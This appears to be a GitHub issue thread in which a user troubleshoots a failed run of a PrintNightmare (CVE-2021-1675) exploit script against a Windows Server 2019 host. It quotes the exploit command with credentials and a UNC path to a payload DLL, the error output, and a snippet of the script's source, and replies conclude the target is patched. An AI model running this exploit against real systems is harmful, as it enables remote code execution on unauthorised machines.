Open Ach13v3-M0n7 opened 2 years ago
Maybe this still helps someone:
0x8001011b is the error code for RPC_E_ACCESS_DENIED. I know that this is an indication of a fixed system when returned for RpcAddPrinterDriver (see, e.g., the functionality of https://github.com/ly4k/PrintNightmare).
In this case, the error is returned for RpcEnumPrinterDrivers. I don't know in detail if this is also a valid sign of a patched system, but it does seem likely.
I am attempting the exploit from an Ubuntu 20 server against a standalone Windows Server 2019 box.
I have confirmed:
- SMB connectivity Ubuntu > Win19 and Win19 > Ubuntu.
- scan via rpcdump.py output returns
Protocol: [MS-RPRN]: Print System Remote Protocol
- Guest Login is enabled on Win19
The command I am running to throw the exploit is:
sudo python3 CVE-2021-1675.py 'notadmin:Password123!@10.209.1.1' '\\10.209.1.2\share\PrintNightmare.dll'
Output received back is:
[*] Connecting to ncacn_np:10.209.1.1[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath: RPRN Session Error: unkown error code: 0x8001011b
I notice in the source code that this exception is on Line 174:
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
if not options.pDriverPath:
    try:
        blob = getDriver(dce, handle)
        pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
        if not "FileRepository" in pDriverPath:
            print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath))
            print("[-] Specify pDriverPath manually")
            sys.exit(1)
    except Exception as e:
        print('[-] Failed to enumerate remote pDriverPath')
        print(str(e))
        sys.exit(1)
I manually checked my Win19 to see if I had the particular driver path, but I do not. I'm not sure if the lack of the particular driver could be the issue, but I have little more to go on than the "[-]" error line in my output.
It's been patched